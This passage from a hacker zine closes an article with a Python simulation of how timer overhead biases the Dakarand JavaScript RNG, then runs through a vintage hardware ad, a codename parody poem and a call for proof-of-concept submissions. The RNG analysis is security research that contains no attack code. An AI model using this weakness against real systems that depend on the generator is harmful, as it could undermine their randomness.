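    """Every call lands the same distance past the millisecond boundary."""
    return lambda: d


def jittered_overhead(base, spread, seed):
    """Overhead in base..base+spread-1 from a seeded PRNG; a constructed
    stand-in for scheduler noise, not a measured browser trace."""
    rng = random.Random(seed)
    return lambda: base + rng.randrange(spread)


def bias_report(run):
    """What the article's tools showed: weight histogram, number of distinct
    flip counts, and the per-value count a uniform byte source would give."""
    byte_values, flip_counts = run
    return {
        "weights": weight_histogram(byte_values),
        "distinct_flip_counts": len(set(flip_counts)),
        "expected_per_value": len(byte_values) / 256,
    }


# Firefox-like: one dominant flip count -> bytes of a single weight.
TIGHT = bias_report(simulate(1000, 64700, constant_overhead(17)))
# Chromium-like: a wide spread of flip counts -> weights cluster around 4.
LOOSE = bias_report(simulate(1000, 45000, jittered_overhead(10, 5000, seed=1)))

if __name__ == "__main__":
    print("tight:", TIGHT)
    print("loose:", LOOSE)
```

With a constant overhead the model produces only two distinct flip counts and every byte after the first has weight 8, which is the extreme form of the peak in the Firefox column; with jitter the weights spread out around 4 as a fair source would. The model says nothing about why one engine schedules more regularly than another, which is the open question the article leaves.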


9.4 Closing words 


In conclusion we see that in Firefox under stress Dan’s RNG appears to fail at exactly the point he wanted 
to use as the main source of randomness. The tiny clock differentials used to gather the entropy are 
not given often enough in Firefox. There is still much room to stress this RNG implementation. Bonus 
rounds would include figuring exactly what the significant difference between the Firefox and Chromium 
JavaScript runtime is that causes this malfunction on Firefox. Also attacks on other JavaScript runtimes 
would be interesting to see. It might even be the case that this implementation has different results 
under different conditions with respect to CPU load. 





A broader question occurs: The Dakarand RNG relies on what could be called a "code clock." It may be 
that in many kinds of environments stressed code clocks tend to go into phase with one another. Driven 
by stress to seek comfort in each other's rhythms, their chance encounters may grow into something more 
close and intimate, grinding into periodic patterns. Which, of course, is bad for randomness. Can we 
learn to tell such environments from others, where periodization with stress doesn't happen? -PML 


MODEL CC-7 SPECIFICATIONS: 


DIGITAL DATA RECORDER $149.95 
FOR COMPUTER ог TELETYPE USE NEW — 8080 1/0 BOARD with ROM. 


A. Recording Mode: Tape saturation binary. 
This is not an FSK or Home type recorder. 
No voice capability. No Modem. (NRZ) 

B. Two channels (1) Clock, (2) Data. OR, Two 
data channels providing four (4) tracks on 
the cassette. Can also be used for Bi-Phase, 
Manchester codes etc. 

C. Inputs: Two (2). Will accept TTY, TTL or 
RS 232 digital. 

D. Outputs: Two (2). Board changeable from 
RS 232 to TTY or TTL digital. 

E. Runs at 2400 baud or less, Synchronous or 
Asynchronous. Runs at 4800 baud or less. 
Synchronous or Asynchronous, Runs at 
3.1''/sec. Speed regulation + .5% 


F. Compatability: Will interface any computer 
or terminal with a serial 1/0. (Altair, Sphere, 
M6800, PDP8, LSI 11, IMSAI, etc. 

G. Other Data: (110-220 V), (50-60 Hz); 3 
Watts total; UL listed 955D; three wire line 
cord; on/off switch; audio, meter and light 
operation monitors, Remote control of mo- 
tor optional. Four foot, seven conductor 
remoting cable provided. Uses high grade 
audio cassettes. 


H. Warrantee: 90 days. All units tested at 300 
and 2400 baud before shipment. Test cas- 
sette with 8080 software program included. 
This cassette was recorded and played back 
during quality control. 


ALSO AVAILABLE: MODEL CC-7A with vari- 
able speed motor. Uses electronic speed control 
at 4’'/sec. or less, Regulation + .296 

Runs at 4800 baud Synchronous or Asynchro- 
nous without external circuitry. 

Recommended for quantity users who ex- 
change tapes. Comes with speed adjusting tape 
to set exact speed. 


Any baud rate up to 4800 





Uses the industry standard tape satura- 
tion method to beat all FSK systems ten to 
one, No modems or FSK decoders required. 
Loads 8K of memory in 17 seconds. This 
recorder, using high grade audio cassettes, 
enables you to back up your computer by 
loading and dumping programs and data fast 
as you go, thus enabling you to get by with 
less memory. Can be software controlled. 


Model CC7 . . . $149.95 
Model CC7A... $169.95 


NATIONAL multiplex 


CORPORATION 
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Permanent Relief from “Bootstrap Chafing” 


This is our new “turnkey” board, Turn on 
your Altair or Imsai and go (No Bootstrap- 
ping). Controls one terminal (CRT or TTY) 
and one or two cassettes with all programs 
in ROM. Enables you to turn on and just 
type in what you want done. Loads, Dumps, 
Examines, Modifies from the keyboard in 
Hex. Loads Octal. For the cassettes, it is a 
fully software controlled Load and Dump at 
the touch of a key. Even loads MITS Basic. 
Ends “Bootstrap Chafe” forever. Uses 512 
bytes of ROM, one UART for the terminal 
and one USART for the Cassettes. Our 
orders are backing up on this one. No. 2SIO (R) 


Kit form $140. Fully assembled and 
tested $170.00 


Send Two Dollars for Cassette Operating 
and Maintenance Manual with Schematics 
and Software control data for 8080 and 
6800. Includes Manual on 
I/O board above. Postpaid 

Master Charge & BankAmericard accepted. 


On orders for Recorders and Kits please add 
$2.00 for Shipping & Handling. 
(N.J. Residents add 5% Sales Tax) 


3474 Rand Avenue, Box 288 
South Plainfield, New Jersey 07080 
(201) 561-3600 


This page intentionally left blank. 
Draw your own damned picture. 
10 Juggernauty 
by Ben Nagy 


‘Twas UMBRA, and the STUNT WORMS 
Did ZARF and CIMBRI in the SUEDE: 
All GUPY were the PUZZLECUBES, 
And the DIRESCALLOP AQUACADE. 
“Beware the JUGGERNAUT, my son! 
The RONIN bytes, the IMSI catch! 
Beware the TUSKATTIRE, and shun 
EGOTISTICAL GIRAFFE!” 


He brought his FERRET CANNON forth: 
yet SKOPE he not the RUTLEY spoor — 
So browsed he to an onion, 
And surfed awhile in Tor. 


And, as in BOOTY Tor he surfed, 
The JUGGERNAUT, with eyes of FLAME, 
Leapt from the EVOLVED MUTANT BROTH, 
with DISHFIRE as it came! 


One, two! One, two! And through and through 
The FERRET CANNON’s furred attack! 
He left it dead, and with its LED 
He rode his QUICK ANT back. 


“And, hast thou slain the JUGGERNAUT? 
Come to my arms, my DANGERMOUSE! 
OLYMPIC day! MESSIAH! MORAY!” 
He TALKQUICK in his joy. 


‘Twas UMBRA, and the STUNT WORMS 
Did ZARF and CIMBRI in the SUEDE; 
All GUPY were the PUZZLECUBES, 
And the DIRESCALLOP AQUACADE. 
“He that is without sin among you, 
let him first cast a stone at her.” 

11 A Call for PoC 
by Rt. Revd. Pastor Manul Laphroaig 


We stand, sit, or simply relax and chill on the shoulders of the giants, Phrack and Uninformed. They 
pushed the state-of-the-art forward mightily with awesome, deep papers and at times even with poetry 
to match. And when a single step carries you forward by a measure of academic years, it’s OK to move 
slowly. 

But for the rest of us dwarves, running around or lounging on those broad shoulders can be so much 
fun! A hot PoC is fun to toss to a neighbor, and who knows what some neighbor will cook up with it 
for the shared roast of the vuln-beast? A neighbor might think, “my PoC is unexploitable” or “it is too 
simple,” but verily I tell you, one neighbor's PoC is the missing cog for another neighbor's 0day. How 
much PoC is hoarded and lies idle while its matching piece of PoC wastes away in another hoard? Let's 
find out! 


11.1 Author guidelines 


Do this: Write an email telling our editors how to reproduce *ONE* clever, technical trick from your 
research. 

Like an email, keep it short. Like an email, you should assume that we already know more than a 
bit about hacking, and that we'll be insulted or—WORSE!—that we'll be bored if you include a long 
tutorial where a quick reminder would do. Don't try to make it thorough or broad. 

Do pick one quick, clever low-level trick and explain it in a few pages. Teach me how to implement 
Dakarand in a 512-byte boot sector; teach me how to compose shellcode in Korean characters; or, teach 
me how to patch Natalie's Tamagotchi shellcode with nothing but MSPAINT.EXE. Don't tell me that it's 
possible; rather, teach me how to do it myself with the absolute minimum of formality and bullshit. 

Like an email, I expect informal (or faux-biblical) language and hand-sketched diagrams. Write it 
in a single sitting, and leave any editing for our poor bastard of an editor to apply to later drafts. 
Send this to pastor@phrack.org and hope that the neighborly Phrack folks—praise be to them!—aren’t 
man-in-the-middling our submission process. 





11.2 Other Departments 


Editor at Large Rt. Revd. Pastor M.L. 

Dept. of Bringing APT Home Cultural attaché of the 41st Directorate 

Dept. of Funky File Formats Ange Albertini 

Dept. of Fail FX of Phenoelit 

Ethics Board The Grugq 

Dept. of Busting BS pipacs 

Poet Laureate Ben Nagy 

Dept. of Drama Xbf 

Dept. of PHY Michael Ossmann 